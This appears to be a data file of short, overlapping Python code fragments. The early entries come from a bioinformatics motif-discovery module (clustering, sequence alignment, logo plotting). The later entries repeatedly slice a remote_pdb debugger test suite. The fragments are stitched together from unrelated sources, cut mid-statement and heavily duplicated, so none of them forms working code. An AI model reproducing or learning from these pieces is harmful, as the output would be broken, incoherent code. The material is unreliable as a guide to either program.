"compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y",
"% \\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d",
"len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq,",
"secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices)",
"from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from",
"pad_inches=0) else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\"",
"= diags self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet",
"fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size,",
"c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list =",
"# ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), #",
"in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq",
"fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b))",
"secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq)",
"[apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async(",
"% cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id,",
"orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster =",
"range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\"",
"if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives",
"len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return",
"if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4,",
"out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout)",
"if freq_th is None or freq >= freq_th: if std_th is None or",
"self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs)",
"start_time = time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score,",
"\"\"\" import logging import multiprocessing as mp import os from collections import defaultdict",
"\"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60,",
"self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs",
"seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time",
"trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs)",
"= ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id",
"%s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' '",
"else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size,",
"= motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score /",
"logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids",
"from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from",
"[] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs",
"= motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences of regex:",
"sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score",
"min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time()",
"to default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f",
"centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids) for i in",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self,",
"algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp import",
"neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for"
] |
[
"func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.'",
"not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with",
"TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb",
"client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}')",
"client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\")",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in",
"TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}')",
"'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at",
"test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.' % test_name)",
"== 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.' % test_name) logging.info('DIED.')",
"10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read,",
"dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n')",
"?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d",
"logging import os import re import socket import sys import time from process_tests",
"client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n')",
"with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}',",
"wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read,",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring",
"%s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s",
"socket import sys import time from process_tests import TestProcess from process_tests import TestSocket",
"session open at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0]",
"== 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test",
"% x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s',",
"x = block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig(",
"print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams):",
"= re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:",
"__file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session",
"%(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif",
"__name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name",
"import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT',",
"%(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple':",
"'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec",
"import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import",
"proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams)",
"func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams'",
"logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if",
"wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with",
"TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams'",
"import re import socket import sys import time from process_tests import TestProcess from",
"__file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session",
"streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:",
"re import socket import sys import time from process_tests import TestProcess from process_tests",
"from process_tests import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from",
"dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT,",
"(.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted",
"\"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def",
"sys import time from process_tests import TestProcess from process_tests import TestSocket from process_tests",
"def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT,",
"proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection",
"print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?')",
"test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True)",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__,",
"with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n')",
"client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not",
") test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect':",
"import os import re import socket import sys import time from process_tests import",
"'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read,",
"TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__,",
"'{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert",
"wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def",
"TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT,",
"connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with",
"def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=>",
"not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False):",
"__future__ import print_function import logging import os import re import socket import sys",
"sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else:",
"wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams)",
"print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x =",
"from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__,",
"process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple():",
"TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read):",
"func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x",
"TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"->",
"format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name ==",
"import time from process_tests import TestProcess from process_tests import TestSocket from process_tests import",
"with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}',",
"process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT =",
"wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable,",
"open at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with",
"\"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\")",
"client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read()",
"at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host,",
"test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}',",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read,",
"'{a1}', '{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session open",
"import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with",
"func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}'",
"proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read,",
"elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.' %",
"client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break",
"in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}')",
"TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:",
"TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon',",
"'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint',",
"port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as",
"'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open",
"proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host,",
"'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _:",
"TestProcess from process_tests import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings",
"import print_function import logging import os import re import socket import sys import",
"wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb",
"'{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session open at",
"\"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect')",
"process_tests import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb",
"wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.')",
"x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\"",
"open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read,",
"import TestProcess from process_tests import TestSocket from process_tests import dump_on_error from process_tests import",
"host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT))",
"in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read):",
"'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\",",
"assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple')",
"test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}',",
"') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)),",
"dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port =",
"re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with",
"with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port",
"TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT,",
"'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect():",
"print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as",
"client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc:",
"print_function import logging import os import re import socket import sys import time",
"def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT,",
"= sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT)",
"client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read,",
"'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def",
"'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon',",
"client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring",
"print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if __name__",
"TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read,",
"def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT,",
"at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT,",
"'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"->",
"\"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.')",
"time from process_tests import TestProcess from process_tests import TestSocket from process_tests import dump_on_error",
"print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n')",
"int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read):",
"from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n')",
"from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read,",
"import logging import os import re import socket import sys import time from",
"print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in",
"process_tests import TestProcess from process_tests import TestSocket from process_tests import dump_on_error from process_tests",
"= block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG,",
"from process_tests import TestProcess from process_tests import TestSocket from process_tests import dump_on_error from",
"if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise",
"patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if",
"%(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name",
"connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\")",
"'__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2]",
"'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.')",
"from __future__ import print_function import logging import os import re import socket import",
"test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}',",
"wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable,",
